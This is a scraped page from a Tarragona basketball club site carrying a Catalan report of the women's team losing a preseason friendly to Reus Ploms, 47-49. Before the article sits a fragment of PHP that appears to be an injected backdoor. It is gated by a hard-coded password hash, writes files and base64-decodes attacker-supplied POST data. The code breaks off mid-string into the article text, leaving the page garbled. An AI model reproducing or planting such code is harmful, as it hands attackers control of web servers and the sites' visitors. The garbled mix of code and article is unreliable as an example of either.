function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet paga el desencert de la primera meitat i cau contra el Reus Ploms en un amistós de pretemporada (47-49) - Tgn Bàsquet Club -

El TGN Bàsquet paga el desencert de la primera meitat i cau contra el Reus Ploms en un amistós de pretemporada (47-49)

Updated: octubre 3, 2020

L’equip sènior femení del TGN Bàsquet va perdre ahir a la nit contra el Reus Ploms en un partit amistós que es va disputar al pavelló del Sagrat Cor. Es tractava d’una presa de contacte real contra un rival, el reusenc, que també militarà en la màxima categoria del bàsquet català, la Copa Catalunya, tot i que en un grup diferent del de les liles. El matx va servir per veure en acció els dos fitxatges del TGN Bàsquet d’aquest curs, Carla Díaz i Helena Cortiella, i per comprovar l’alt nivell defensiu de les tarragonines.

La primera part va ser de clar domini visitant. El Ploms va començar molt fort amb tres triples consecutius que van obligar el tècnic local, Víctor Neila, a demanar temps mort per intentar redreçar la situació (1-9, 6:09 pel final del 1Q). Les tarragonines van tenir un llast en els seus baixos percentatges de tir. Tot i moure la pilota amb bon criteri, els tirs lliurats no entraven de cap manera i això va permetre el Ploms dominar amb certa claredat (12-20, 1Q).

El domini sota els cèrcols de la visitant Sheila Maeztu va ser el complement ideal per al tir exterior de les reusenques. Maeztu va ser imparable al pal baix, aconseguint diverses situacions de dos més un. Les diferències es van anar ampliant (14-26, 4:27 pel descans) en uns minuts on les locals van patir molt per anotar (2 punts en els primers 8 minuts i mig de segon quart) i no va ser fins al final quan en un parell d’accions ràpides, van poder encistellar quatre punts i minimitzar el dany (18-32 al descans).

La batuta de Cortiella

Conscients de la seva falta de punteria, les liles van apostar-ho tot a la defensa. Les noies que entrena Víctor Neila van fer una exhibició de solidaritat, esforç, coneixement de conceptes defensius i pressió que les va permetre anar escurçant el desavantatge (26-32, 6:45 pel final del 3Q). El Ploms no jugava amb tanta comoditat i tenia problemes per dur la pilota a camp ofensiu. La pressió de les tarragonines les va permetre recuperar pilotes abans del mig camp i en pista defensiva, i les transicions ofensives van sovintejar. En aquest apartat cal destacar el duet format per Cortiella i Garcia, que van aportar un gran dinamisme al joc lila. Veloces, intuïtives i intel·ligents, Cortiella i Garcia van saber trobar forats en la defensa estàtica del Ploms però també atacar el bàsquet quan veien la més petita escletxa en l’entramat reusenc (34-41, 3Q).

El Ploms perdia una pilota rere una altra davant la desesperació del tècnic visitant. El Ploms va perdre una de les seves referents, Quintana —poc encertada ahir—, després de fer una falta molt dura a Laura Pascual, que va haver de marxar lesionada. L’àrbitre va assenyalar antiesportiva i una tècnica tot seguit a Quintana per protestar. La dinàmica era favorable a les locals —des del descans, de fet— i la diferència entre els dos equips quedava pràcticament al mínim (45-48 a 2:39 del final). El Ploms va tornar a confiar en Maeztu per desencallar els seus atacs i es va entrar a l’últim minut amb 47-48 al marcador. El TGN Bàsquet no va ser capaç de trobar les millors opcions d’atac i el Ploms va sentenciar des del tir lliure.

Demà diumenge 4 d’octubre, l’equip de Víctor Neila tornarà a jugar un altre amistós. En aquesta ocasió s’enfrontarà al CB Lleida en un partit que es jugarà al pavelló de Barris Nord (19 h).